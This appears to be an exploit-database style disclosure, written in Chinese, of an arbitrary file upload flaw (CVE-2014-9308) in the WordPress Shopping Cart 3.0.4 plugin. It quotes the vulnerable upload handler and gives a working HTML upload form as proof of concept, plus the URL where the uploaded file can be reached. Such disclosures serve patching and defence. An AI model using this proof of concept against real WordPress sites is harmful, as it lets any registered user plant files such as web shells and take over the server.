WordPress Shopping Cart 3.0.4 --任意文件上传

<p># 受影响版本: WordPress Shopping Cart 3.0.4 </p><p># 日期: 29-10-2014</p><p># 软件链接: <a href=“https://wordpress.org/plugins/wp-easycart/”>https://wordpress.org/plugins/wp-easycart/</a></p><p># CVE: CVE-2014-9308</p><p># 类别: 应用程序</p><p>漏洞详情：</p><p>任何注册用户都可以上传任何文件。<br></p><p>上传点: wp-easycart\inc\amfphp\administration\banneruploaderscript.php<br></p><p>$date = $_POST[‘datemd5’];</p><p>$usersqlquery = sprintf(“SELECT  ec_user.*, ec_role.admin_access FROM  ec_user  LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE  ec_user.password = ‘%s’ AND  (ec_user.user_level = ‘admin’ OR ec_role.admin_access = 1)”, mysql_real_escape_string($requestID));</p><p>$userresult = mysql_query($usersqlquery);</p><p>$users = mysql_fetch_assoc($userresult);</p><p>if ($users || is_user_logged_in()) {</p><p> $filename = $_FILES[‘Filedata’][‘name’];</p><p> $filetmpname = $_FILES[‘Filedata’][‘tmp_name’];</p><p> $fileType = $_FILES[“Filedata”][“type”];</p><p> $fileSizeMB = ($_FILES[“Filedata”][“size”] / 1024 / 1000);</p><p> $explodedfilename = pathinfo($filename);</p><p> $nameoffile = $explodedfilename[‘filename’];</p><p> $fileextension = $explodedfilename[‘extension’];</p><p> move_uploaded_file($FILES[‘Filedata’][‘tmp_name’], “…/…/…/products/banners/”.$nameoffile."“.$date.”.".$fileextension);</p><p>}</p>
验证：
Login as regular user (created using wp-login.php?action=register):

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php&#34; method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
<input type="file" name="Filedata">
<input value="Upload!" type="submit">
</form>
File will be visible:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%